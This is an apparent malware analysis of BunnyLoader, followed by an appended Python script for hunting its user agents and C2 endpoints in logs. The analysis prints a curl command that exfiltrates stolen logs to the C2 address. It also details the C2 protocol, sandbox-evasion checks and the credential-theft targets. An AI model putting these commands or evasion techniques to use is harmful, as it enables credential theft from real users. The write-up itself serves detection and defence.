BunnyLoader, the newest Malware-as-a-Service

Niraj Shivtarkar

In the following section, we will analyze a malware sample of BunnyLoader. Upon execution of BunnyLoader, the loader performs the following actions:

- Creates a new registry value named “Spyware_Blocker” in the Run registry key (HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run) where the value is the path to the BunnyLoader binary. This registry value allows BunnyLoader to maintain persistence on the machine.
- Hides the window using ShowWindow() with nCmdShow as SW_HIDE
- Creates a mutex named “BunnyLoader_MUTEXCONTROL” via CreateMutexW()
- Performs the following anti-VM techniques:
  - Checks for the following modules:
    - SxIn.dll – 360 Total Security
    - cmdvrt32.dll / cmdvrt64.dll – Comodo Antivirus
    - wine_get_unix_file_name – Detects Wine
    - SbieDll.dll – Sandboxie
  - Checks for a VM using “ROOT\CIMV2” queries:
    - SELECT * FROM Win32_VideoController
    - Win32_Processor
    - Win32_NetworkAdapter
    - Win32_BIOS
    - SELECT * FROM Win32_ComputerSystem
  - Checks for a Docker container via “/proc/1/cgroup” – if the container exists, BunnyLoader does not perform further malicious actions.
  - Checks for the following blacklisted sandbox usernames:
    - ANYRUN
    - Sandbox
    - Test
    - John Doe
    - Abby
    - Timmy
    - Maltest
    - malware
    - Emily
    - Timmy
    - Paul Jones
    - CurrentUser
    - IT-ADMIN
    - Walker
    - Lisa
    - WDAGUtilityAccount
    - Virus
    - fred

If a sandbox is identified, BunnyLoader throws the following error message:

“The version of this file is not compatible with the current version of Windows you are running. Check your computer’s system information to see whether you need an x86 (32-bit) or x64 (64-bit) version of the program, and then contact the software publisher.”

Otherwise, BunnyLoader performs an HTTP registration request to a C2 server as shown below:

GET /Bunny/Add.php?country=<country>&ip=<ip>&host=<host>&ver=2.0&system=Microsoft+Windows+10+Pro%0A&privs=Admin&av=Windows+Defender HTTP/1.1
User-Agent: BunnyLoader
Host: 37[.]139[.]129[.]145
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Mon, 25 Sep 2023 21:11:41 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4
X-Powered-By: PHP/8.2.4
Content-Length: 11
Content-Type: text/html; charset=UTF-8

Connected

The registration request sent to the C2 server (shown above) contains the following information:

Information in C2 server request (value – description):

- country – Gathers the country where the infected system is connecting from via “http[:]//ip-api.com/csv” where the user agent is “BunnyRequester”
- ip – Gathers the victim IP from “http[:]//api.ipify.org” where the user agent is “BunnyRequester”
- host – Gathers the hostname via GetComputerNameA
- ver – The version of BunnyLoader (e.g., 2.0)
- system – Fetches the operating system via systeminfo | findstr /B /C:"OS Name"
- privs – Fetches the privileges of the current user via OpenProcessToken. Sends “Admin” if the user is an administrator or sends the string “user”.
- av – Gathers the anti-virus on the infected machine via wmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get displayName /value

The user agent for the request is set to “BunnyLoader”. If the response from the C2 is “Connected”, BunnyLoader performs the core malicious actions.

Task Execution

After registration, BunnyLoader sends a task request to the C2 server “http[:]//37[.]139[.]129[.]145/Bunny/TaskHandler.php?BotID=<bot_id>” with the user agent as “BunnyTasks”. As shown below, the response to the task request consists of the “ID”, “Name” and “Params”.

GET /Bunny/TaskHandler.php?BotID=<Bot_ID> HTTP/1.1
User-Agent: BunnyTasks
Host: 37[.]139[.]129[.]145
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Mon, 25 Sep 2023 21:11:41 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4
X-Powered-By: PHP/8.2.4
Content-Length: 102
Content-Type: text/html; charset=UTF-8

ID: 5 Name: Run Stealer Params: ID: 3 Name: Bitcoin Params: bc1<bitcoin_address>5k

Here the “Name” is the module (functionality) to be executed and the “Params” are the parameters passed to the module. Based on the module name received in the task response, BunnyLoader further performs its actions.

BunnyLoader consists of the following tasks:

- Trojan Downloader
  - Download and Execute (Fileless Execution)
  - Download and Execute (Disk Execution)
- Intruder
  - Run Keylogger
  - Run Stealer
- Clipper
  - Bitcoin
  - Monero
  - Ethereum
  - Litecoin
  - Dogecoin
  - ZCash
  - Tether
- Remote Command Execution

Run Keylogger Task

BunnyLoader implements a basic keylogger using GetAsyncKeyState() for logging keystrokes. The output of the keylogger is stored in the file “C:\Users\<username>\AppData\Local\Keystrokes.txt”.

Run Stealer Task

BunnyStealer is designed to steal information related to web browsers, cryptocurrency wallets, VPNs and much more. Eventually the stolen information is stored in a folder named “BunnyLogs” in the AppData\Local directory, which is compressed as a ZIP archive, and exfiltrated to the C2 server. The following are the web browsers targeted by BunnyLoader:

- 7Star\7Star\User Data
- Yandex\YandexBrowser\User Data
- CentBrowser\User Data
- Comodo\User Data
- Chedot\User Data
- 360Browser\Browser\User Data
- Vivaldi\User Data
- Maxthon3\User Data
- Kometa\User Data
- K-Melon\User Data
- Elements Browser\User Data
- Google\Chrome\User Data\\Sputnik\Sputnik\User Data
- Epic Privacy Browser\User Data
- Nichrome\User Data
- uCozMedia\Uran\User Data
- CocCoc\Browser\User Data
- Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer
- Uran\User Data
- CatalinaGroup\Citrio\User Data
- Chromodo\User Data
- Coowon\Coowon\User Data
- Mail.Ru\Atom\User Data
- liebao\User Data
- Microsoft\Edge\User Data
- QIP Surf\User Data
- BraveSoftware\Brave-Browser\User Data
- Orbitum\User Data
- Chromium\User Data
- Comodo\Dragon\User Data
- Google(x86)\Chrome\User Data
- Amigo\User\User Data
- MapleStudio\ChromePlus\User Data
- Torch\User Data
- Iridium\User Data

BunnyLoader steals the following information from these web browsers:

- AutoFill data
- Credit cards
- Downloads
- History
- Passwords

The malware targets the following cryptocurrency wallets:

- Armory
- Exodus
- AutomaticWallet
- Bytecoin
- Ethereum
- Coinomi
- Jaxx
- Electrum
- Guarda

BunnyLoader steals credentials from the following VPN clients:

- ProtonVPN
- OpenVPN

Credentials are also stolen from the following messaging applications:

- Skype
- Tox
- Signal
- Element
- ICQ

Examples of the stolen information are shown in the figure below. The logs consist of an information.txt file which contains system information along with the information related to the location of the infected machine. Each folder contains the corresponding data stolen from the system. For example, the Browser folder contains the web browser history and downloaded file information.

Figure 5: A screenshot of the information exfiltrated by BunnyLoader.

The stolen data is archived using the PowerShell cmdlet: System.IO.Compression.ZipFile with the filename “BunnyLogs_<hostname>.zip”. The ZIP archive is exfiltrated to the C2 server via the following CURL command:

cmd.exe /c curl -F “file=@C:\Users\user\AppData\Local\BunnyLogs_468325.zip” http[:]//37[.]139[.]129[.]145/Bunny/Uploader.php

BunnyLoader also performs a stealer registration request containing statistics related to the stolen information and the link to the exfiltrated logs with the user agent: “BunnyStealer”, as shown below:

GET /Bunny/StealerRegistration.php?country=<country>&ip=<ip>&system=Microsoft+Windows+10+Pro%0A&chromium=18&crypto=1&messages=0&vpn=0&keys=0&link=http%3A%2F%2F37[.]139[.]129[.]145%2FBunny%2FStealerLogs%2FBunnyLogs_468325.zip&date=Mon+Sep+25+21%3A47%3A41+2023%0A&games=0 HTTP/1.1
User-Agent: BunnyStealer
Host: 37[.]139[.]129[.]145
Cache-Control: no-cache

Clipper Task

The BunnyLoader clipper module checks a victim’s clipboard for content matching cryptocurrency addresses and replaces them with a wallet address controlled by the threat actor.

In this case, the targeted cryptocurrencies are:

- Bitcoin
- Monero
- Ethereum
- Litecoin
- Dogecoin
- ZCash
- Tether

The clipper receives the cryptocurrency wallet addresses to replace from the C2 server.

Download and Execute Task

BunnyLoader performs two types of download and execute functions.

- The first type is downloading a file from a URL provided by the C2, which is written to disk in the AppData\Local directory and further executed.
- The second type uses fileless execution, where BunnyLoader creates a “notepad.exe” process in a suspended state and then downloads the payload from the received URL with the user agent “BunnyLoader_Dropper”. The downloaded binary is stored in a memory buffer and BunnyLoader performs Process Hollowing to inject the downloaded payload into the “notepad.exe” process as shown in the figure below.

Figure 6: A screenshot of BunnyLoader fileless download and executing code.

After the tasks are completed, BunnyLoader sends the following task completion request with the user agent as “TaskCompleted” and the CommandID as the Task ID. An example task completion request is shown below:

http://37[.]139[.]129[.]145/Bunny/TaskHandler.php?CommandID=5&BotID=272148461

Remote Command Execution Task

BunnyLoader performs remote command execution from the C2 panel. BunnyLoader receives the commands to be executed on the infected machine via an “echoer” request to the C2 server (e.g., http[:]//37[.]139[.]129[.]145/Bunny/Echoer.php) with the user agent set to “BunnyTasks” as shown in the figure below. BunnyLoader parses the response and checks for the following commands: “help”, “cd”, “pwd”. It then executes the command using _popen, and the command output is sent to the C2 server as the “&value=” parameter in a result command request (e.g., http[:]//37[.]139[.]129[.]145/Bunny/ResultCMD.php) with the user agent: “BunnyShell”.

Figure 7: A screenshot of BunnyLoader remote command execution.

BunnyLoader also performs a heartbeat request in order to inform the C2 that the infected system is online as shown below. The user agent for the heartbeat is “HeartBeat_Sender”.

GET /Bunny/Heartbeat.php?country=<country>&ip=<ip>&host=<hostname>&ver=2.0&system=Microsoft+Windows+10+Pro%0A&privs=Admin&av=Windows+Defender HTTP/1.1
User-Agent: HeartBeat_Sender
Host: 37[.]139[.]129[.]145
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Mon, 25 Sep 2023 21:11:41 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4
X-Powered-By: PHP/8.2.4
Content-Length: 13
Content-Type: text/html; charset=UTF-8

Client online
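The user agents and /Bunny/ script names described throughout this analysis can be turned into a proxy-log hunt. The following is an added example, not code from the original analysis: the log format, host names and client addresses are constructed. It also shows why the URL path matters, because the curl upload to Uploader.php carries no Bunny-specific user agent.

```python
import re
from urllib.parse import urlsplit, parse_qs

# User-agent strings and the stage each one marks, as listed in the analysis.
BUNNY_USER_AGENTS = {
    "BunnyRequester": "country/IP lookup",
    "BunnyLoader": "registration",
    "BunnyTasks": "task or echoer request",
    "BunnyStealer": "stealer registration",
    "BunnyLoader_Dropper": "payload download",
    "BunnyShell": "command result",
    "HeartBeat_Sender": "heartbeat",
    "TaskCompleted": "task completion",
}
# Script names requested under /Bunny/ in the analysis (compared lower-cased).
BUNNY_ENDPOINTS = {
    "add.php", "taskhandler.php", "uploader.php", "stealerregistration.php",
    "echoer.php", "resultcmd.php", "heartbeat.php",
}

# Constructed log format: <timestamp> <client> <method> <url> "<user-agent>"
LOG_RE = re.compile(
    r'^(?P<ts>\S+) (?P<src>\S+) (?P<method>[A-Z]+) (?P<url>\S+) "(?P<ua>[^"]*)"$'
)

# Constructed sample; c2.example stands in for the C2 address.
SAMPLE_LOG = """\
2023-09-25T21:11:40Z 10.0.0.5 GET http://ip-api.com/csv "BunnyRequester"
2023-09-25T21:11:41Z 10.0.0.5 GET http://c2.example/Bunny/Add.php?country=XX&host=WS-01&ver=2.0 "BunnyLoader"
2023-09-25T21:12:00Z 10.0.0.5 GET http://c2.example/Bunny/TaskHandler.php?BotID=123456 "BunnyTasks"
2023-09-25T21:47:41Z 10.0.0.5 POST http://c2.example/Bunny/Uploader.php "curl/8.0.1"
2023-09-25T21:48:00Z 10.0.0.9 GET http://intranet.example/index.html "Mozilla/5.0 (Windows NT 10.0)"
2023-09-25T21:48:05Z 10.0.0.9 GET http://shop.example/bunny/catalog.php "Mozilla/5.0 (Windows NT 10.0)"
""".splitlines()


def classify(line):
    """Return a hit dict if the log line matches a BunnyLoader indicator, else None."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    parts = urlsplit(m["url"])
    segs = [s for s in parts.path.split("/") if s]
    reasons = []
    stage = BUNNY_USER_AGENTS.get(m["ua"])
    if stage:
        reasons.append(f"user-agent {m['ua']} ({stage})")
    # Path check catches requests whose user agent is generic (the curl upload).
    if len(segs) >= 2 and segs[0].lower() == "bunny" and segs[-1].lower() in BUNNY_ENDPOINTS:
        reasons.append("endpoint /" + "/".join(segs))
    if not reasons:
        return None
    query = parse_qs(parts.query)
    return {
        "ts": m["ts"],
        "src": m["src"],
        "reasons": reasons,
        "bot_id": query.get("BotID", [None])[0],
        "host": query.get("host", [None])[0],
    }


def scan(lines):
    """Group hits by client address so each suspected host can be triaged."""
    hits = {}
    for line in lines:
        hit = classify(line)
        if hit:
            hits.setdefault(hit["src"], []).append(hit)
    return hits


if __name__ == "__main__":
    for src, found in scan(SAMPLE_LOG).items():
        for h in found:
            print(src, h["ts"], "; ".join(h["reasons"]))
```
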